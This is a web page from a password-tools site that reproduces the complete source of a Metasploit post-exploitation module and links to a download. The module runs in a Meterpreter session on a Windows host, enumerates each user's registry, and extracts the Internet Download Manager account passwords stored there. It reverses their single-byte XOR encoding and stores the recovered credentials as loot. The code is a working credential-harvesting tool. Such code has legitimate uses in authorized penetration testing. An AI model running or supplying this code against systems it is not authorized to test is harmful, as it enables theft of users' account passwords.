Today's Deals

Metasploit - Internet Download Manager (IDM) Password Extractor Author: Silent Dream        See Also Index of all Password Tools Index of all Password Secrets Articles IDMPasswordDecryptor - IDM Password Recovery Software BrowserPasswordDecryptor - All in one Browser Password Recovery Software     Module Description This module recovers the saved premium download account passwords from Internet Download Manager (IDM). These passwords are stored in an encoded format in the registry. This module traverses through each of these registry entries automatically and decodes them.       Module Code Here is the complete Metasploit code for this module.   ## # $Id: enum_idm_pwds.rb 13398 2011-07-29 01:22:00Z sinn3r $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' require 'msf/core/post/windows/registry' class Metasploit3 < Msf::Post include Msf::Post::Windows::Registry include Msf::Auxiliary::Report def initialize(info={}) super( update_info( info, 'Name' => 'Internet Download Manager (IDM) Password Extractor', 'Description' => %q{ This module recovers the saved premium download account passwords from Internet Download Manager (IDM). These passwords are stored in an encoded format in the registry. This module traverses through these registry entries and decodes them. Thanks to the template code of thelightcosine's CoreFTP password module. }, 'License' => MSF_LICENSE, 'Author' => [ 'sil3ntdre4m <sil3ntdre4m[at]gmail.com>', 'SecurityXploded Team <contact[at]securityxploded.com>' ], 'Version' => '$Revision: 13398 $', 'Platform' => [ 'windows' ], 'SessionTypes' => [ 'meterpreter' ] )) end def run creds = Rex::Ui::Text::Table.new( 'Header' => 'Internet Downloader Manager Credentials', 'Ident' => 1, 'Columns' => [ 'Site', 'User', 'Password' ] ) registry_enumkeys('HKU').each do |k| next unless k.include? "S-1-5-21" next if k.include? "_Classes" print_status("Looking at Key #{k}") begin subkeys = registry_enumkeys("HKU\\#{k}\\Software\\DownloadManager\\Passwords\\") if subkeys.empty? or subkeys.nil? print_status ("IDM not installed for this user.") return end subkeys.each do |site| user = registry_getvaldata("HKU\\#{k}\\Software\\DownloadManager\\Passwords\\#{site}", "User") epass = registry_getvaldata("HKU\\#{k}\\Software\\DownloadManager\\Passwords\\#{site}", "EncPassword") next if epass == nil or epass == "" pass = xor(epass) print_good("Site: #{site} (User=#{user}, Password=#{pass})") creds << [site, user, pass] end print_status("Storing data...") path = store_loot( 'idm.user.creds', 'text/plain', session, creds, 'idm_user_creds.txt', 'Internet Download Manager User Credentials' ) print_status("IDM user credentials saved in: #{path}") rescue ::Exception => e print_error("An error has occured: #{e.to_s}") end end end def xor(ciphertext) pass = ciphertext.unpack("C*") key=15 for i in 0 .. pass.length-1 do pass[i] ^= key end return pass.pack("C*") end end     Download Here is the Metasploit download link to this module.   Download     References Source : Metasploit modules / post / windows / gather / enum_idm_pwds.rb   See Also Index of all Password Tools Index of all Password Secrets Articles IDMPasswordDecryptor - IDM Password Recovery Software BrowserPasswordDecryptor - All in one Browser Password Recovery Software               100% FREE Today »» FREE Gift for You (worth $29.95) Browser Password Recovery Pro Download Now New Free Software »» Mobile Password Recovery Download Now Top 10 Free Downloads »» WiFi Password Decryptor Asterisk Password Spy Product Key Decryptor Browser Password Decryptor Mail Password Decryptor FTP Password Decryptor Facebook Password Decryptor Google Password Decryptor Website Blocker WiFi Network Monitor Top 10 Pro Softwares »» Social Password Recovery Pro All-In-One Key Finder Pro All-In-One Password Recovery Pro WiFi Password Recovery Pro Google Password Recovery Pro Email Password Recovery Pro Asterisk Password Recovery Pro Browser Password Recovery Pro Website Blocker Pro All-In-One External Drive Password Pro How to Recover Passwords »» How to Recover Facebook Password How to Recover Gmail Password How to Recover Instagram Password How to Recover Outlook Password How to Recover WiFi Password Latest Releases »» Mobile Password Recovery v1.0 Browser Password Decryptor v16.0 FireMaster v8.0 FireMaster Cracker v5.0 IE Password Decryptor v13.0 Outlook Password Decryptor v14.0 Foxmail Password Decryptor v7.0 Wi-Fi Network Monitor v7.0 Top Research Articles »» Password Secrets of Popular Windows Applications Penetration Testing with Metasploit Framework Reference Guide - Reversing & Malware Analysis Training Exposing Wireless Password Secrets & Techniques Hidden Rootkit Process Detection Our Enterprise Company www.XenArmor.com Testimonials »» "I have found 'SecurityXploded' tools to be an invaluable asset..." James Cadden, East Lansdowne Police, Pennsylvania, USA Awards »» Awards for our softwares from leading Download Sites

About SX About Company Awards Testimonials Contact Security Tools Enterprise Softwares Free Password Tools Wi-Fi Security Tools Anti Spyware Tools Windows Security Tools Resources Password Articles Security Articles Security Videos Metasploit Modules Software Pad Files Our Security Group XenArmor XenArmor Blog SecurityTrainings Security Blog SecurityXploded SecurityXploded - SAFE & SECURE Site Certification

SecurityXploded © 2007-2025, All rights reserved. Division of XenArmor Security Pvt Ltd. Sponsored Post  |  Advertise  |  Privacy  |  Terms  |  About  |  Contact